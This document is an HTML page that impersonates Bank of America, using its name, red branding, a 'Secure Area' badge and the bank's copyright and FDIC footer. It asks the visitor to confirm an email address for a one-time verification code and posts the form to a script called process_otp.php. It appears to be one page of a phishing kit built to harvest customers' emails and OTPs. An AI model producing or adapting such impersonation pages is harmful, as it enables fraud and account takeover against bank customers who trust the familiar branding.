<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Bofa - Confirm Email</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #fff;
            color: #000;
            margin: 40px;
        }

        .container {
            max-width: 400px;
            margin: auto;
            text-align: left;
        }

        h1 {
            font-size: 22px;
            color: #c00;
        }

        label {
            display: block;
            margin-top: 20px;
            font-size: 14px;
        }

        input[type="email"] {
            width: 100%;
            padding: 10px;
            margin-top: 8px;
            font-size: 16px;
            border: 1px solid #ccc;
            border-radius: 4px;
        }

        input::placeholder {
            color: #aaa;
        }

        button {
            margin-top: 25px;
            padding: 10px 20px;
            background-color: #c00; /* Red background for the button */
            color: #fff;
            border: none;
            border-radius: 4px;
            font-size: 16px;
            cursor: pointer;
        }

        button:hover {
            background-color: #a00; /* Darker red on hover */
        }

        .footer {
            margin-top: 50px;
            font-size: 12px;
            color: #999;
            text-align: center;
        }

        .secure {
            color: #c00;
            font-weight: bold;
            margin-bottom: 10px;
        }
    </style>
</head>
<body>
<div class="container">
    <div class="secure">Secure Area</div>
    <h1>Verify Your Contact Information</h1>
    <p>Please confirm the email address linked to your account so we can send you a one-time verification code (OTP).</p>

    <form action="process_otp.php" method="POST">
        <label for="email">Email Address</label>
        <input type="email" id="email" name="email" placeholder="example@email.com" required>

        <button type="submit">Send Code</button>
    </form>

    <div class="footer">
        Bank of America, N.A. Member FDIC.<br>
        © 2025 Bank of America Corporation.
    </div>
</div>
</body>
</html>
